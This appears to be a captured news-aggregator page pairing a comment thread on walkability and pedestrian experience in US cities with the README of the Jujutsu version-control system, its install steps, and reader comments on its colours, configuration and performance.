Anti-car people tend to be single or at least childless, and they fail to understand that the majority of Americans aren't like them. About 40 percent of households have kids under 18, i.e. 60-80% of American adults have kids of the age where having a car is immensely helpful. So while these people also recognize that it's annoying to press the button to turn the light green or to walk around a parked car, those are nowhere near the top of their life's concerns.
So I think the 'we want' is a bit presumptuous in the headline. The guy who wrote the article is a city councilor and an avid biker but what he doesn't seem to be is a parent, so his concerns are skewed a certain way vs the mass of the population.
Like I said, I get the love of walking and walkable spaces, but I see now that this is way more interesting when you are single. As a parent you also get excited about things like tossing all your groceries into the trunk.
That's because you live in a car centric place. In a well designed city, a car is optional. I recommend watching Not Just Bikes videos on the subject: https://www.youtube.com/@NotJustBikes/videos
The thing is we (as an American society) really don't want a shift to walking. We like the idea of walking more but won't actually do it. Instead we'll make up a million excuses about why we just can't walk.
I say this as someone who at 40 years old has never learned to drive and who has walked/bicycled/taken the bus virtually everywhere I've needed to go. And I've lived in very rural and very suburban areas, as well as mid-size and bigger cities.
I know it's possible. It's just that the vast majority of people don't want to do it. And if you show them it can be done they'll just make up a new excuse and keep on driving.
Can you explain this to me?
For example, my local supermarket is an 8-minute walk from my house. Driving there would take about 5 minutes, due to one-way streets etc, so including the hassle of parking it takes about as long. Driving there seems positively insane to me, except if I'm shopping for a party or something and need to fill the trunk. Are you saying that Americans would choose the car here? Or that in America it's a 5-minute drive vs a 25-minute walk?
Cause tbh in the latter case I'd pick the car too, despite my Dutch habits.*
I guess what I'm trying to ask is, are you sure it's American psyche and not, mostly, the town layout as this article suggests?
*) okok I'm Dutch so I'd bike, but I kept that out to stick with the walk vs car topic
> I say this as someone who at 40 years old has never learned to drive and who has walked/bicycled/taken the bus virtually everywhere I've needed to go.
I say this with no mockery or disrespect, just description . . . you are not normal. I mean in a statistical sense. Not only are you part of (maybe the last) generation who salivated over the thought of getting a driver's license at 16 and getting away from Mom and Dad, for the vast majority of Americans, this is a totally unrealistic ask for day-to-day life. Either because of urban design or else living somewhere rural enough where it's infeasible.
Urban solutions do not always work across a country as vast, huge, and diverse as the US.
American cities, with a tiny number of exceptions, are not built for walking and biking. When neighborhoods, businesses, and infrastructure are built, their design is fundamentally based on the assumption that the users of it will have a personal motor vehicle.
We're talking about what it would take to induce behavioral change on a societal level. I don't mean to be rude, but when someone comes into a discussion like this and says 'well actually, if everyone lived like me it would be fine. Everyone else is just too lazy', it's essentially a non-sequitur and comes off as you trying to hold yourself in some kind of position of moral superiority.
You're 40 years old, so I expect you to know this already, but I'll let you in on a little secret: you cannot rely on other people to do the right thing on a mass scale. You can, however, rely on them doing the easy/comfortable thing.
The challenge in sustainability is to align the good with the comfortable as much as possible.
It is commendable that you've managed to live car-free so long in such a car-centric country, but we cannot rely on all 340 million people living their lives like you have.
I live in the US, and have spent time in something like half a dozen European countries, and I can tell you that there's a clear reason why Europeans walk & bike more, and it's not because 'Americans are too lazy not to drive' or something like that.
> We like the idea of walking more but won't actually do it.
Wrong.
The reason people don't walk is simply because walking mostly really sucks in like 95% of urban or suburban contexts in the states. Even crossing the street once can be a huge pain in the ass sometimes (e.g. strip mall to strip mall across two giant parking lots and an enormous stroad).
It is astoundingly rare to find an actual nice, not-tiny area to walk in, in terms of urban design and points of interest. To a lot of Americans, 'has sidewalks' means an area is walkable, which is just...so, so very wrong.
I lived in Germany for five years, and during our annual summer trip back to the states, it was always so sad to see the pathetic state of walking and biking infrastructure everywhere we went. It's like we're not even trying...because, well, we're not. Walking here sucks because we choose to make it suck.
I've seen people lose their jobs because they weren't willing to walk a half mile. No car, but taking Uber for that trip. It turns out, Uber is not reliable transportation. But walking usually is.
This has not been my experience. I'm lucky to live in a very walkable part of a very walkable city, and almost every time someone comes to visit I find they've disappeared within 24 hours to 'explore the area'.
These are people who virtually never walk anywhere unless they have to, but you put them in the right environment and they almost can't help it.
How do you get toddlers to daycare, preteens to soccer practice, etc.
I don't like the word dignity for this. I think a clearer term would be priority.
We want to encourage people to be pedestrians so pedestrians should have priority over cars. In some countries, pressing a walk button actually triggers the stoplight to cycle to yellow then red for cars. Why not implement that more frequently? Also favor putting cars/roadways through tunnels rather than pedestrians. Surface can be nice parks.
Priority is a ceiling which can shift; see the history of public transit in LA, before car companies destroyed it.
Dignity is a floor; it is very difficult to lower a floor.
I liked lots of this, but I really disagree with the night shot. What about the dignity of the people living along the bright (overly) lighted sidewalk, who lose their dark skies and dark bedrooms?
Street lights suck, and should be absolutely minimized, and turned off at 22h. If you feel intimidated by the dark, you can solve that for yourself: don't shine your fears into my windows.
There is actually a simple solution, which is to put red lights on street lamps instead of white lights. You can buy LEDs which emit only in frequencies that won't disturb circadian rhythms.
They are a bit more expensive, but I think the reason we don't do this is because planners/governments are probably unaware of the problematic nature of light pollution.
It's as easy as bending and cutting some sheet metal into shrouds so the light doesn't enter residential windows.
My place has this problem and I'm not sure why it does. The solution seems so cheap and obvious to me. Just shape the shroud so the beam only shines downward.
I'm confused by this sentiment. It's possible to illuminate the sidewalk without shining in through people's windows (or cause excess light pollution, for that matter), especially if the sidewalk is the only thing you need to illuminate and the lamps can be built lower. It's also not unjustified fear. The risk of being subjected to violent crime such as robbery, assault or rape is higher when there is no illumination.
Recently I've seen that in our city new street lights on minor roads near buildings usually have a special form and lower height specifically to counter this problem
Excuse me, what? No, if I need to walk through late at night, I want to be safe. You have some options: put the bedrooms away from the street, invest in some curtains, or live somewhere more pastoral???
Agreed. I wish there were a standard practice of turning off streetlights between certain hours, to reduce light pollution.
It was over 100 degrees where I was in the Houston area. I don't want to walk anywhere. Nicer sidewalks won't change profuse sweating. All of the bike and walk crowd seems to have never been to Houston in the summer. It's 80 degrees in Cupertino right now and 96 degrees in Houston as I type this. That's a huge difference in what is comfortably walkable.
Nobody likes walking in 100 degree heat. When I lived in Europe, certainly walkable towns were awesome. Although, I do remember being on subways in Paris that didn't have air conditioning in July and it was straight up miserable to be packed into a sardine can surrounded by sweaty aromatic people, then exiting the station to be greeted by a blast furnace on the surface and then walking multiple blocks to the destination.
Taking a taxi was air conditioned comfort and a welcome luxury when I could afford it. I am not knocking Paris, but making the point that the ideology of eliminating private transport in favor of being out in the elements is a regression, not an improvement.
There should be balance when it comes to transport options. Streets can be improved, but it shouldn't be at the expense of cars entirely. Make it great for all modes of transport. A great example is when Houston ripped up driving lanes to add bike lanes — other than hobby cyclists, those lanes are rarely used unless it's on one of the six days a year that the weather is nice enough. The bike lanes made traffic worse while benefiting just a few die-hards that cycle as some sort of social protest rather than as a legitimate means of navigating this huge city.
Why not make motorcycle and motor scooter lanes instead of bike lanes? Why do people insist on trying to turn Houston into Amsterdam? Houston isn't Amsterdam. Greater Houston is 10,000 square miles with 7.5 million people. Greater Amsterdam is 1000 square miles with 2.5 million people.
Trying to make places with very hot weather "walkable" is about as logical as building a ski resort in Austin.
Barcelona is hot too but somehow it works, because fewer cars and more trees (especially near sidewalks) mean nicer walking even in hot summer. 'Greater Houston is 10,000 square miles with 7.5 million people. Greater Amsterdam is 1000 square miles with 2.5 million people.' - Yes, we know that American towns are inferior because of parking requirements and local zoning; yes, the problem is more complex. But does that mean it's not a problem, or should people just start slowly fixing it? (Like abolishing parking requirements and zoning laws, and passing a law that forces a nice sidewalk and bike lane to be built whenever a street is renovated, slowly fixing the problem.) We can't know for sure that a walkable city won't work in Houston, because laws generally prohibit building one with those stupid requirements.
I'm an Aussie, and after living 3 months in LA I think it was the most poorly designed city I've ever been to for this exact reason - I felt unable to walk practically anywhere!
It felt like my options were drive or taxi. And we know what LA traffic is like.
I can't speak to other US cities, and it is possible that certain areas of LA are less terrible than where I stayed. (But I will say, I was in quite an affluent area which had no business being unwalkable and without public transport).
But it really opened my eyes to how good we have it in Australian cities (which themselves are still far behind many European cities).
Santa Monica, Hollywood, Burbank, Los Feliz, Downtown, Pasadena, Long Beach, are all rather walkable.
This article kind of skips out on safety. Many of the urban areas that have the density for walking, often have issues of homelessness and open drug use that makes people feel unsafe walking, especially with children.
It must be easy to ignore a homeless population if you can just drive past them
I moved from Spain to the US, and I often find myself trying to explain to people back home just how miserable and even humiliating the pedestrian experience is here.
Here are some other examples of things that I think contribute to the hostile walking experience in the US:
* Cars parked in short driveways often extend all the way across the sidewalk. Even if you can easily step off onto the road to walk around them (not all pedestrians can), it just feels like a slap in the face to have to do that.
* Cars have much higher and stronger headlights, with the high beams often left on, and drivers are generally much less mindful of them. As a pedestrian walking at night on under-lit streets, you are constantly getting blinded.
* Tinted windows (even the mild level of tint that most cars in the US have). The whole experience of being a lone vulnerable pedestrian among a sea of cars is made even worse when you can't see the people in the cars (but you know they can see you).
* Often the only option to get food late at night is fast food places, which become drive-thru only after a certain time. Having to go through the drive-thru on foot is obviously a terrible experience, and they will often refuse to even serve you.
Tinted windows are such a pet peeve of mine. I get it in the tropics but in most of America the individual benefits of dark tint seem like they'd be outweighed by the collective good of better visibility through cars, enabling eye contact with drivers, etc.
The SUV craze is really to blame - in general many US states don't allow dark tint on traditional cars but do on SUVs. And since rear windows on vans and light trucks (aka SUVs) are exempted from window tint restrictions, pull up to a typical intersection in the US and look around and you can't see worth a damn.
Somehow it's ok for a Subaru Crosstrek to have dark tint but not an Impreza that is the same car but lower? There are even more weird situations like the Mercedes Benz GLA compact CUV which typically has tinted windows, but not the top-of-the-line AMG trim because that one has a lowered suspension, making it a "car" instead of a "light truck".
> The whole experience of being a lone vulnerable pedestrian among a sea of cars is made even worse when you can't see the people in the cars (but you know they can see you).
It's even worse than that. You don't know they can see you, you know they could see you but you cannot know if they do see you. That's terrible for pedestrian safety.
Adding even MORE to the insult is this part from the article: 'many agencies will simply remove pedestrian facilities to reduce the cost of compliance'. I see that so often: having to cross the damn intersection three times just to continue across, and all the light timings favor cars. It's a big middle finger.
The first one doesn't seem unique to the US.
I just spent the last 2 months in Europe and on many side streets there is no place to safely stop a car, which means pulling onto the sidewalk is the only option. So I frequently had to step into the street to walk around a stopped delivery van or similar.
really?
Tokyo is very oriented towards pedestrian traffic, considering shinkansen and most rail service - yet satellite suburban sites, like Saitama, etc have tiny residential rows that literally don't fit both a car and a pedestrian. And that's where most people live. Yet Japan is highly pedestrian.
Now, South America. Most if not all urban centers of 1M are extremely well covered by bus networks. And they have to be, since most of the population cannot afford a car. However, the moment you step out of the old city centers, you are literally walking on the main road, sharing space with speeding cars and buses driving like maniacs. You will often find a major road has literally no sidewalk, only dirt, weeds and sewage.
Compared to those situations, the US is a walking paradise.
The problem of distance is very different from the problem of safety and comfort in the US.
'Often refuse to serve you' means that they sometimes do? I tried to go through a drive-thru on a bicycle in Czechia and they told me to fuck off.
I've never heard the experience described as "humiliating," which is incredibly surprising because just seeing that written out (and your thoughtful elaboration) made a lot of things click into place for me.
It is illegal in most places to park a car on the sidewalk. I don't know of anyone, at least the big chains, that will serve a pedestrian in a drive thru. If you live in a more walkable part of town there is usually an all night diner.
Actually, the tinted windows worry me because I don't know whether the drivers do see me. Vanishingly few drivers would deliberately run over a pedestrian, but plenty are distracted or otherwise inattentive.
just how miserable and even humiliating the pedestrian experience is here
I ended up talking to some woman yesterday who mentioned she loved to come back to Oakland because of how walkable it is compared to where she is now in the Central Valley. I was amused at the whole exchange because while Oakland and San Francisco do a decent job, they're by no means great.
> Cars parked in short driveways often extend all the way across the sidewalk. Even if you can easily step off onto the road to walk around them (not all pedestrians can), it just feels like a slap in the face to have to do that.
One of the big things I noticed when comparing the pedestrian experience in Manhattan (and to a lesser extent the outer boroughs) to San Francisco is that New York lacks the curb cuts that encourage this kind of behavior. You spend a lot less time walking around parked cars or having to keep an eye out for someone who's in a hurry to exit 'their' driveway. In San Francisco, at least, there's a big tug of war about where your driveway ends and the curb begins. Suffice to say, blocking the curb is one of those things that's almost never enforced.
Also this:
https://old.reddit.com/r/sanfrancisco/comments/155z0eo/frien...
> I often find myself trying to explain to people back home just how miserable and even humiliating the pedestrian experience is here.
Same. I've lived in Los Ángeles and Amsterdam, and it is impossible to explain to my friends and family just how awful the quality of life is in LA precisely because of the difference in attitudes and priorities over cars. Perhaps some have "nicer" (aka bigger) houses in LA than they would have in Ámsterdam, but once they leave their front door everything is objectively worse
People in this thread are really talking past each other. I've been to the nice Asian mega cities with great and clean subways and buses. And I've lived in the American suburbs. You can't make the American suburbs like the mega cities by just making them walkable.
Everything in a mega city works together to make transit work. Those tall buildings? They provide great shade no matter how sunny it is which is critical for walking to bus stops and subway stations. Also, the walk itself is so much more interesting, random stores to stop at and places to eat and go to. Density makes transit work.
You can't just put random stores in a suburb and make it 'walkable' and expect the same thing. Just as everything in a mega city works together to make transit work, everything in a suburb works together to make cars work.
We need to give up on the mass transit solutions that work for dense cities (subways and buses) for suburbs. It's a waste of money and completely the wrong solution. It hasn't worked for decades and never will.
Shut down bus systems for suburbs and use the government funds to give out ride sharing (either Uber or government run) credits for everyone to use (low income can get more credits). That's what a suburb is designed for, point-to-point travel such as cars. And invest massively in real protected, useful bike lanes and stop trying to kill e-bikes with regulations (which a lot of cities are trying to do). e-bikes are finally a real alternative to cars in suburbs, it has just the right amount of travel speed and ease to challenge the car, but it's already under attack. Ride sharing credits and e-bikes, these are the solutions for suburbs. Stop trying to fit a square peg (buses and subways) into a round hole.
Well, TBH in Europe you usually don't have an option to get food late at night :)
This lens is underutilized in the discourse, but people feel it acutely. Even a lot of the anti-cycling stance comes down to, "What am I, poor?" When you are using transportation infrastructure that's designed with contempt for you, you know, and you don't want to be there. See also: rail slow zones, buses that shimmy and rattle violently on imperfect pavement, how Muni trains close their doors and pull one foot out of the station just to wait at a red light. If you've never seen good, dignified implementation of walking and transit then a lot of this seems inherent & car culture seems synonymous with dignity. Short of tickets to Amsterdam for everyone, I don't know how to fix it.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
Or this tired bit of 'wit': 'Oh, you're biking? Let me guess, DUI?'
'Muni trains close their doors and pull one foot out of the station just to wait at a red light'
What is the reason for this? I see it all the time in metro areas, and it always blows my mind that traffic lights aren't synced with the tram schedules.
> how Muni trains close their doors and pull one foot out of the station just to wait at a red light
There are safety and scheduling reasons for this. They are not merely trying to snub riders. For example, the light rail trains here have a standard for how long they open their doors at each station. It's something like 14 seconds. A vehicle with open doors will also allow passengers to disembark; it's a two-way passage. So should they sit in the station with closed doors, or push off a few yards down to the intersection? Now, other motorists see a train stopped at a station and they think one thing. They see a train stopped and waiting for a red light and they know that it will proceed through on green. It seems weird to imagine a train that lingers at the station as if it's boarding but it's not, it's really waiting for the light to change, and then it will pounce on the opportunity. That's less than predictable behavior, as far as other motorists are concerned.
Our transit authority reminds riders to arrive at the stop 5 minutes early. We're also reminded that if we miss this one, another one is on the way. Passengers need not inherit that toxic road rage.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?" When you are using transportation infrastructure that's designed with contempt for you, you know, and you don't want to be there.
I grew up in close contact with a large urban poor population and I think the view of bikes was the exact opposite of this. Biking in the city is considered the purview of affluent white people
I have a pretty strong anti-cycling stance, because I watched my New York neighborhood that was a pedestrian paradise significantly degraded by bike lanes. The balance of walking, subways, busses, taxis and delivery trucks had worked pretty well. Bicyclists introduced the concept of failing to yield, then acting indignant and entitled.
>Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
I agree with the overall point that people don't want to cycle because the experience sucks, but your description feels like an unnecessarily inflammatory way to say 'people are willing to pay for a more pleasant experience'. Nobody says 'a lot of the anti-cheap laptop stance comes down to, 'what am I, poor?'.
> Short of tickets to Amsterdam for everyone, I don't know how to fix it.
I just got back to the US from Amsterdam. I'll never look at these awful streets the same again.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
Maybe this will change now that bikes cost more than most used cars. Spending 15K on a bike is a thing now.
A great post. My only nitpick is that Amsterdam isn't a particularly good example of active travel in NL.
Ah, let us look at the data. In reality, only rich (and white) folks can afford to live in areas that are not car-dependent.
https://granfondodailynews.com/2020/01/17/is-north-american-...
> From 2001 to 2017 the number of people cycling increased the fastest among high income, highly educated, employed, white men between the ages 25 and 44.
The cause and effect might be reversed.
1) Most people prefer to drive... look at any country that is getting richer - people want to buy cars.
2) It is only when people cannot afford to drive or driving is too inconvenient (traffic, or narrow streets/lack of parking in Europe, or outright restrictions ), they will use alternative modes of transportation.
3) The more people are thus inconvenienced, the more public support there is for the alternative modes (simply by the numbers); moreover, an average person biking and taking transit becomes richer/nicer, so the political will to improve the experience increases even faster than the number of people; plus the experience becomes nicer even without extra investment.
It's a flywheel either way.
Now, you could argue that global warming is bad / enough freeways cannot be built / etc., sure. Maybe we cannot have nice things.
But don't argue that people want to live in urban paradise and some contrived system is simply not giving them what they want. Most people everywhere, when they can, want to drive and live in houses. Except in some places many can afford that and have the infrastructure, and in some only a few do. It's not like car ownership and traffic is that low in Europe, given how admittedly convenient it is to not have one and how relatively expensive car ownership is, esp. in relation to incomes.
It's so strange because it isn't that people are flooding into cities and bringing their car fixation with them. As a rural/suburban person, nobody I know from here drives when they're traveling in a city because the driving experience is so miserably bad compared to driving in the country. It's the city people who think moving five feet every thirty seconds and bathing in an ocean of car horn noises is somehow compatible with human life.
Every morning, I get up at 5AM, and walk 5K.
Half a mile of it is on the local high school running track.
That's because the neighborhood after the high school (where I would prefer to walk) is actively hostile to pedestrians. No sidewalks, no shoulders, lots of blind curves, and a ton of distracted drivers. It's dangerous as hell.
In fact, I often smell weed, when cars pass me.
At 5:30 AM.
That's a great way to get started on a productive day.
Just throwing it out there, but it would be nice if there were a lot more pedestrian- and bike-only roads built separate from car roads. Big cities already have recreational walking trails that typically follow some sort of drainage or sewage 'river'.
Another thing I wondered: under most city streets there is already wiring and tunnels and some infrastructure. Is the cost that unreasonable to convert roads one by one so that cars go underground and intersections overlap to avoid stops? Then all you need is exits to parking spaces and low-speed residential streets. Cars get to go a lot faster with little stopping in cities (which will reduce freeway jams), fewer pedestrians die, and self-driving cars would do well there too. Flooding is the main issue I can think of, but given climate change, cities need to become much more flood tolerant anyway, so more flood tunnels and digging might be needed regardless.
In my ideal city, these roads will also have systems for small-package delivery/transport and garbage disposal, where people select the type of garbage and put it in a box; upon validation they get credits for it if it gets recycled. There would also be less packaging waste, because the package delivery system wouldn't need boxes with your address on them; it would just move the stuff, as-is. This would work with grocery delivery and even high-volume destinations, from warehouses to Walmarts, which also require a lot of packaging and waste. Now imagine this delivery system as a subway for packages, and imagine adding humans to the mix, delivering them to destinations as if they were packages; then you need far fewer cars and less parking-space waste. That type of transportation removes the downsides of public transportation, like sharing space with a lot of people and being picked up/dropped off at specific points and then having to walk to the destination.
Just random ideas to put out there for anyone who reads and knows the subject better.
> Big cities already have recreational walking trails
Those are a great example of the problem. Often those recreational walking trails are very nice, but they don't go anywhere functional.
Milton Keynes tried separating pedestrians and cyclists, it is mostly considered a failure.
Reasons include: they built the place so well for cars that everybody owns a car; poorly lit underpasses; confusing layout; and crime, plus the feeling of being alone if somebody were to attack, due to no cars passing by and no shop windows.
https://www.cycling-embassy.org.uk/blog/2012/04/27/they-buil...
https://forum.cyclinguk.org/viewtopic.php?t=46081
'You have to cycle quite a long way to get anywhere useful - Signage is appalling. If I hadn't had the map I would have got quite lost. [the cycle paths don't follow the grid system]'
Tunnels are quite dangerous, having cars at high speed for long distances is extra dangerous. Having them leave the tunnel is either a highway junction or a stroad. There is one in Boston though. https://www.youtube.com/watch?v=d5pPKfzzL54
559 points about 14 hours ago by lemper in 10000th position
github.com | Estimated reading time – 11 minutes | comments | anchor
This is not a Google product. It is an experimental version-control system (VCS). I (Martin von Zweigbergk, [email protected]) started it as a hobby project in late 2019. That said, it is now my full-time project at Google. My presentation from Git Merge 2022 has information about Google's plans. See the slides or the recording.
Jujutsu is a Git-compatible DVCS. It combines features from Git (data model, speed), Mercurial (anonymous branching, simple CLI free from 'the index', revsets, powerful history-rewriting), and Pijul/Darcs (first-class conflicts), with features not found in most of them (working-copy-as-a-commit, undo functionality, automatic rebase, safe replication via rsync, Dropbox, or distributed file system).
The command-line tool is called jj for now because it's easy to type and easy to replace (rare in English). The project is called 'Jujutsu' because it matches 'jj'.
If you have any questions, please join us on Discord. The glossary may also be helpful.
Jujutsu has two backends. One of them is a Git backend (the other is a native one). This lets you use Jujutsu as an alternative interface to Git. The commits you create will look like regular Git commits. You can always switch back to Git. The Git support uses the libgit2 C library.
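As a small sketch of what that looks like in practice (the commands below are believed correct for recent jj versions but may differ in yours; the URL is just this project's own repo used as an example):
# Clone an existing Git repository through the Git backend
jj git clone https://github.com/martinvonz/jj.git
cd jj
# Browse history; the underlying commits are ordinary Git commits
jj log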
Almost all Jujutsu commands automatically commit the working copy. That means that commands never fail because the working copy is dirty (no 'error: Your local changes to the following files...'), and there is no need for git stash. You also get an automatic backup of the working copy whenever you run a command.
Also, because the working copy is a commit, commands work the same way on the working-copy commit as on any other commit, so you can set the commit message before you're done with the changes.
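A minimal sketch of that workflow (command names assumed from the current CLI; the commit message is made up):
# Give the work-in-progress commit a message before you're done
jj describe -m 'refactor: extract config parsing'
# Check status; the working copy is snapshotted automatically
jj st
# Start a new change on top once this one is ready
jj new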
With Jujutsu, the working copy plays a smaller role than with Git. Commands snapshot the working copy before they start, then they update the repo, and then the working copy is updated (if the working-copy commit was modified). Almost all commands (even checkout!) operate on the commits in the repo, leaving the common functionality of snapshotting and updating of the working copy to centralized code. For example, jj restore (similar to git restore) can restore from any commit and into any commit, and jj describe can set the commit message of any commit (defaults to the working-copy commit).
All operations you perform in the repo are recorded, along with a snapshot of the repo state after the operation. This means that you can easily revert to an earlier repo state, or to simply undo a particular operation (which does not necessarily have to be the most recent operation).
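For example (a sketch; the operation IDs printed by jj op log are specific to your repo, so the placeholder below must be replaced):
# List recorded operations, most recent first
jj op log
# Undo the most recent operation (say, an accidental rebase)
jj undo
# Or roll the whole repo back to the state after an earlier operation
jj op restore <operation-id>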
If an operation results in conflicts, information about those conflicts will be recorded in the commit(s). The operation will succeed. You can then resolve the conflicts later. One consequence of this design is that there's no need to continue interrupted operations. Instead, you get a single workflow for resolving conflicts, regardless of which command caused them. This design also lets Jujutsu rebase merge commits correctly (unlike both Git and Mercurial).
Demo recordings in the original README: basic conflict resolution, and juggling conflicts.
Whenever you modify a commit, any descendants of the old commit will be rebased onto the new commit. Thanks to the conflict design described above, that can be done even if there are conflicts. Branches pointing to rebased commits will be updated. So will the working copy if it points to a rebased commit.
Besides the usual rebase command, there's jj describe for editing the description (commit message) of an arbitrary commit. There's also jj diffedit, which lets you edit the changes in a commit without checking it out. To split a commit into two, use jj split. You can even move part of the changes in a commit to any other commit using jj move.
The tool is quite feature-complete, but some important features like (the equivalent of) git blame are not yet supported. There are also several performance bugs. It's also likely that workflows and setups different from what the core developers use are not well supported.
I (Martin von Zweigbergk) have almost exclusively used jj to develop the project itself since early January 2021. I haven't had to re-clone from source (I don't think I've even had to restore from backup).
There will be changes to workflows and backward-incompatible changes to the on-disk formats before version 1.0.0. Even the binary's name may change (i.e. away from jj). For any format changes, we'll try to implement transparent upgrades (as we've done with recent changes), or provide upgrade commands or scripts if requested.
See below for how to build from source. There are also pre-built binaries for Windows, Mac, or Linux (musl).
On most distributions, you'll need to build from source using cargo directly.
First make sure that you have the libssl-dev, openssl, and pkg-config packages installed by running something like this:
sudo apt-get install libssl-dev openssl pkg-config
Now run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli
If you're on NixOS, you can use the flake for this repository.
For example, if you want to run jj loaded from the flake, use:
nix run 'github:martinvonz/jj'
You can also add this flake url to your system input flakes. Or you can install the flake to your user profile:
nix profile install 'github:martinvonz/jj'
If you use linuxbrew, you can run:
If you use Homebrew, you can run:
You can also install jj via MacPorts (as the jujutsu port):
sudo port install jujutsu
You may need to run some or all of these:
xcode-select --install
brew install openssl
brew install pkg-config
export PKG_CONFIG_PATH="$(brew --prefix)/opt/openssl@3/lib/pkgconfig"
Now run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli
Run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli --features vendored-openssl
You may want to configure your name and email so commits are made in your name. Create a file at ~/.jjconfig.toml and make it look something like this:
$ cat ~/.jjconfig.toml
[user]
name = 'Martin von Zweigbergk'
email = '[email protected]'
To set up command-line completion, source the output of jj util completion --bash/--zsh/--fish (called jj debug completion in jj <= 0.7.0). Exactly how to source it depends on your shell.
source <(jj util completion) # --bash is the default
Or, with jj <= 0.7.0:
source <(jj debug completion) # --bash is the default
autoload -U compinit
compinit
source <(jj util completion --zsh)
Or, with jj <= 0.7.0:
autoload -U compinit
compinit
source <(jj debug completion --zsh)
jj util completion --fish | source
Or, with jj <= 0.7.0:
jj debug completion --fish | source
source-bash $(jj util completion)
Or, with jj <= 0.7.0:
source-bash $(jj debug completion)
The best way to get started is probably to go through the tutorial. Also see the Git comparison, which includes a table of jj vs. git commands.
There are several tools trying to solve similar problems as Jujutsu. See related work for details.
[1] At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend.
my initial reaction, half OT:
Ooof, random 'ASCII' (actually: Unicode) art & dev-chosen colors, my bane of 'modern' CLI applications. That drawing you like? Doesn't work for me, give me the raw output please. Those colors you love? Aside from red-green weakness being the most dominant factor, what you're really doing is trying to set things apart, tying color to semantics as well. It's nice this works fine on your white-on-black terminal. Have you tried this on a white-on-firebrick terminal? Yellow-on-green? Or anything else than _your_ 'normative' setup? Man ...
Also not sure the information presented is adequate. E.g. consider commit 76(2941318ee1) - jj makes it look like that was committed to that repository, while it was done to another. The git presentation looks more spot-on (for that particular commit, while the rest of the display is just a mess - ASCII art that does not add semantics, random colors); also where is 1e7d displayed in jj's output? Why is jj's order different? I remain unimpressed by both UIs.
' Create a file at ~/.jjconfig.toml' ... $XDG_CONFIG_HOME ?
When is that working copy committed? When I run jj? Why bother, when it's not working asynchronously and automatically? And if you commit working copies, do you sync under the hood with stuff the other folks you collaborate with? If not, why bother?
Oh nice, a command to fix 'stale' workspaces.. how about you don't let workspaces go stale?
This may all seem to make sense to git-minded people, given the comments here. To me, neither jj nor git make sense (as fossil-minded person who has to work with git), so shrug enjoy....
..but please fix that ASCII Art and Color Stuff, thank you very much.
I don't mind color, but pushing beyond the 16 colors is often a stretch without a very specific use case & bound to lead to a lack of legibility for some unless both foreground & background are defined—which has a tendency to look just as bad in a terminal. Similar issues happen with CSS when folks define color but not background color.
But the one CLI trend that annoys me is using emoji in terminal output. I often find their colors and shapes to be too distracting, commanding too much of the visual hierarchy of output. They also have a tendency to kind of fall apart when some characters or combinations of characters are missing or they no longer line up with the monospace output. A big part of CLI output is being able to scroll through the logged output, but the emoji actually make visual scanning more difficult.
All the colours can be adjusted or turned off entirely in the config. [1] A number of different graph styles are supported [2], and failing that, you can completely customise the output template [3]
$XDG_CONFIG_HOME/jj/config.toml is supported, that's where I keep mine.
The working copy is updated whenever you run jj by default, but watchman is also supported (recently added). [4]
In my experience, the command to fix the stale workspaces only needs to be run in exceptional cases where a bug got triggered and a command failed to complete or if you're doing manual poking around.
It's a mindset shift, but it's well worth it in my opinion.
[1] https://github.com/martinvonz/jj/blob/main/docs/config.md#ui... [2] https://github.com/martinvonz/jj/blob/main/docs/config.md#gr... [3] https://github.com/martinvonz/jj/blob/main/docs/templates.md [4] https://github.com/martinvonz/jj/blob/main/docs/config.md#fi...
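For the grandparent's complaint, the relevant bits of config look roughly like this (key names are taken from the linked config docs and may differ by version):

# ~/.jjconfig.toml (excerpt)
[ui]
color = "never"        # or "auto" / "always"
graph.style = "ascii"  # plain ASCII graph instead of curved Unicode lines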
Does it honor NO_COLOR?
If not, then I have https://github.com/alrs/nofun
> It's nice this works fine on your white-on-black terminal
I was curious about this as well, as I found the images in the README a bit hard to read. In fact the program itself seems to use quite sensible colours in my white-background terminal, and it also respects the NO_COLOR environment variable.
This looks really cool, I'll try it out on some of my repos to get a feel for it.
Too bad support/discussion happens entirely on Discord.
Support/discussion happens a fair amount on GitHub Discussions and Issues as well.
Realistically, Jujutsu is a pretty new project and there are many features to add and lots and lots of code that needs to be written. There is a lot of talking that needs to happen, in other words. So, most of the developers and committers actively hang out and discuss things in Discord, yes, because it's convenient, and fast, and allows all the interested parties to be alerted. I say this as someone who started hacking/working on Jujutsu recently; having Discord has been nice for such a new project.
The reality is that the project is in a part of its life where active discussion and feedback with the userbase is pretty valuable. So, you just go where the users are, and Discord is a big place for that.
GitHub Issues and GitHub Discussions are also actively used by a lot of people, and you can just post things there. Every major committer watches those venues as well, AFAIK, I know my notifications are set up for it.
Over time, assuming things are wildly successful, you'd probably have a lot of different venues to discuss things. I would view Discord mostly in the context of a new project that wants feedback, in that regard.
Does anyone have experience with large repos of, say, 100 GB? Does jj incur performance penalties compared to native git?
It depends on whether you're talking about 100 GB repository size or working copy size.
- Currently no partial/shallow clones, so you need to materialize the entire repo on disk.
- Working copy status can take a while (see https://github.com/martinvonz/jj/issues/1841 for tracking issue). This can be ameliorated at present by configuring Watchman as a filesystem monitor, and work is underway to improve status further.
- No support for Git LFS at present (even in colocated repos). When using the Git backend with jj, you would expect the same problems with regards to large file management.
- I haven't noticed any particular performance issues when interacting with the object store of a large repository. It should be approximately the same as for Git since it uses libgit2 for the Git backend.
- Faster for operations that can be done in-memory in jj but only on-disk with Git, such as various rebase operations.
The tool looks great; I have a hurdle to overcome with the name.
I'm long accustomed to spelling it, in English, as Jujitsu. I've also seen Jiu-jitsu. 'jutsu' is much less common, IME.
Is there such a thing as a canonical Romanisation of Nipponese? I can deal with a project being 'wrong' better than not knowing which of us is wrong.
I think your question is getting into the field of martial arts lineage. People might have their own narratives/ mythologies around this, but here's the most neutral way I can explain it: As techniques and styles evolve over the years, people come up with new names to describe those styles. Name similarities will often imply closer ties in lineage.
